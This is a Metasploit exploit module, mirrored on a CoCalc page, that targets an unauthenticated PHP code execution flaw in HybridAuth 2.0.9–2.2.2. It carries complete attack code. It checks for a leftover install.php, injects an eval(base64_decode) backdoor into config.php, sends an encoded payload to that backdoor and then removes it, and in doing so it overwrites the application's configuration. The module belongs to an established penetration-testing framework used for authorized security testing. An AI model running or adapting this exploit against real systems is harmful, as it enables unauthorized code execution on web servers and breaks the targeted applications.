Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ManualRanking # application config.php is overwritten
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'HybridAuth install.php PHP Code Execution',
16
'Description' => %q{
17
This module exploits a PHP code execution vulnerability in
18
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
19
is not removed after installation allowing unauthenticated users to
20
write PHP code to the application configuration file 'config.php'.
21
22
Note: This exploit will overwrite the application configuration file
23
rendering the application unusable.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'Pichaya Morimoto', # Discovery and PoC
28
'bcoles' # Metasploit
29
],
30
'References' => [
31
['EDB', '34273'],
32
['OSVDB', '109838']
33
],
34
'Arch' => ARCH_PHP,
35
'Platform' => 'php',
36
'Targets' => [
37
# Tested:
38
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
39
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
40
],
41
'Privileged' => false,
42
'DisclosureDate' => '2014-08-04',
43
'DefaultTarget' => 0,
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
52
register_options(
53
[
54
OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
55
]
56
)
57
end
58
59
#
60
# Check:
61
# * install.php exists
62
# * config.php is writable
63
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
64
#
65
def check
66
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
67
if !res
68
vprint_error "Connection failed"
69
return Exploit::CheckCode::Unknown
70
elsif res.code == 404
71
vprint_error "Could not find install.php"
72
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
73
vprint_error "#{$1} is not writable"
74
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
75
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
76
vprint_status "Found version: #{version}"
77
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
78
return Exploit::CheckCode::Vulnerable
79
else
80
vprint_error "HybridAuth version #{version} is not vulnerable"
81
end
82
end
83
Exploit::CheckCode::Safe
84
end
85
86
#
87
# Exploit
88
#
89
def exploit
90
# check vuln
91
if check != Exploit::CheckCode::Vulnerable
92
fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
93
end
94
95
# write backdoor
96
print_status "Writing backdoor to config.php"
97
payload_param = rand(1000)
98
res = send_request_cgi(
99
'method' => 'POST',
100
'uri' => normalize_uri(target_uri.path, 'install.php'),
101
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
102
)
103
if !res
104
fail_with Failure::Unknown, "#{peer} - Connection failed"
105
elsif res.body =~ /Installation completed/
106
print_good "Wrote backdoor successfully"
107
else
108
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
109
end
110
111
# execute payload
112
code = Rex::Text.encode_base64(payload.encoded)
113
print_status "Sending payload to config.php backdoor (#{code.length} bytes)"
114
res = send_request_cgi({
115
'method' => 'POST',
116
'uri' => normalize_uri(target_uri.path, 'config.php'),
117
'data' => "#{payload_param}=#{code}"
118
}, 5)
119
if !res
120
print_warning "No response"
121
elsif res.code == 404
122
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
123
elsif res.code == 200 || res.code == 500
124
print_good "Sent payload successfully"
125
end
126
127
# remove backdoor
128
print_status "Removing backdoor from config.php"
129
res = send_request_cgi(
130
'method' => 'POST',
131
'uri' => normalize_uri(target_uri.path, 'install.php'),
132
'data' => 'OPENID_ADAPTER_STATUS='
133
)
134
if !res
135
print_error "Connection failed"
136
elsif res.body =~ /Installation completed/
137
print_good "Removed backdoor successfully"
138
else
139
print_warning "Could not remove payload from config.php"
140
end
141
end
142
end
143
144